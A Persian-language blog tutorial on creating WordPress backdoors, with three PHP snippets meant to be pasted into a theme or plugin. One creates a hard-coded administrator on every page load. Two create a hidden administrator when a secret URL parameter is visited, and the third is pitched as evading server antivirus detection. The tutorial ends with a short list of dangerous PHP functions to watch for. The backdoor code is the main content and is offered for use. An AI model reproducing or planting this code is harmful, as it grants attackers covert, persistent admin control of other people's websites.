بکدور در وردپرس

فهرست مطالب

آموزش ساخت بکدور در وردپرس و php

🔺بکدور ها نقش زیادی در هک سیسم عامل ها ، وبسایت ها ، سرورها و ... دارند. در این آموزش یاد میگیریم که چطور یک بکدور ایجاد کنیم آن را فعال کنیم و با آن کار کنیم.

بکدور ها نقش زیادی در هک سیسم عامل ها ، وبسایت ها ، سرورها و … دارند. در این آموزش یاد میگیریم که چطور یک بکدور ایجاد کنیم آن را فعال کنیم و با آن کار کنیم.

این یک نمونه ساده بکدور در وردپرس هست که یک نام کاربری و پسورد ایجاد میکند.

 

و وقتی ایجاد شد دیگه توی پنل ادمین هر کاری کنید این ادمین قابل حذف شدن نیست.

کافیست این کد رو در یکی از پلاگین ها یا فاکشن قالب قرار دهید

 



add_action( 'init', 'wp_create_user_backdoor' );

function wp_create_user_backdoor() {

$user_id = wp_create_user('admin455', 'password14552');
$user = new WP_User($user_id);
$user->set_role('administrator');

}

 

 

چگونه این بکدور را فعال کنیم؟

کافیست این کد رو توی یه قالب و افزونه قرار بدید

 

 

add_action( 'wp_head', 'my_wordpress_set_name' );

function my_wordpress_set_name() {
If ($_GET['sarzamin'] == 'wordada') {
require('wp-includes/registration.php');
If (!username_exists('worda12')) {
$user_id = wp_create_user('worda12', 'Pa55W0rd');
$user = new WP_User($user_id);
$user->set_role( 'administrator' );
}
}
}

 

وقتی کد را قرار دادید هیچ اتفاقی نخواهد افتاد اما اگر این لینک را درون مروگر بزنید و جای site.com آدرس سایت مورد نظر را بزنید

https:/site.com/?sarzamin=wordada

یه ادمین با نام کاربری worda12 و پسورد Pa55W0rd برای شما ساخنته خواهد شد و میتوانید لاگین کنید.

اما کد بالا قدیمی شده و اکثر آنتی ویروسا به عنوان مالور شناسایی خواهند کرد

 

اگر بخوایم بکدور به عنوان مالور شناسایی نشود چه کاری باید انجام شود؟

 

در قسمت قبل یاد گرفتیم یک بکدور برای ساخت ادمین وردپرس بسازیم اما آنتی ویروس های سرور به عنوان مالور شناسایی میکردند و پاک میشد اما کد زیر به عنوان مالور شناسایی نمیشود. کافیست این کد رو درون قالب یا افزونه قرار دهید:

 
add_action('wp_head', 'wp_header_admin_name');

function wp_header_admin_name() {
if ($_GET['go'] == 'word') {
if (!username_exists('username')) {
$user_data = array(
'user_login' => 'admin1',
'user_pass' => MD5('Adaea'),
'user_nicename' => 'admina',
'user_email' => 'admin@exle.com',
'user_registered' => date('Y-m-d H:i:s'),
'user_status' => 0,
'display_name' => 'admin'
);
$user_id = wp_insert_user($user_data);
update_user_meta($user_id, 'wp_capabilities', array('administrator' => 1));}}}
 

 

وقتی کد را قرار دادید و لینک زیر را درون مروگر بزنید:

https:/site.com/?go=word

با زدن این لینک یک ادمین با نام کاربری admin1 و پسورد Adaea برای شما خواهد ساخت و میتوانید به عنوان ادمین سایت لاگین کنید.

 

 

چگونه جلوی توابع خطرناک php را بگیریم و از ایجاد دسترسی بکدورها جلوگیری کنیم؟

 

لیست توابع خطرناک php:

  • socket_create,socket_create_listen
  • socket_create_pair,link
  • dl
  • openlog
  • syslog
  • system
  • passthru
  • exec
  • shell_exec
  • popen
  • proc_open
  • stream_socket_server
  • curl_multi_init

هرگاه در فایل های خود این توابع را مشاهد کردید آن تابع نشانگر دسترسی غیرمجاز به وبسایت شما میباشد و باید با دقت بیشتری فایل های مربوط به این فانکشن ها را بررسی و حذف کنید.


				
در بحث‌‌ پیرامون این مقاله شرکت کنید!
در تلگرام
کدینکس را دنبال کنید!
در اینستاگرام
کدینکس را دنبال کنید!
تیم تحریریه کدینکس
این مقاله به کوشش منظم اعضای تیم کدینکس تولید شده است. تک‌تک ما امیدواریم که با تلاش خود، تاثیری هر چند کوچک در بهبود کیفیت وب فارسی داشته باشیم.

پیشنهاد میکنیم این مقالات را هم بخوانید

2 پاسخ

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

8 + 4 =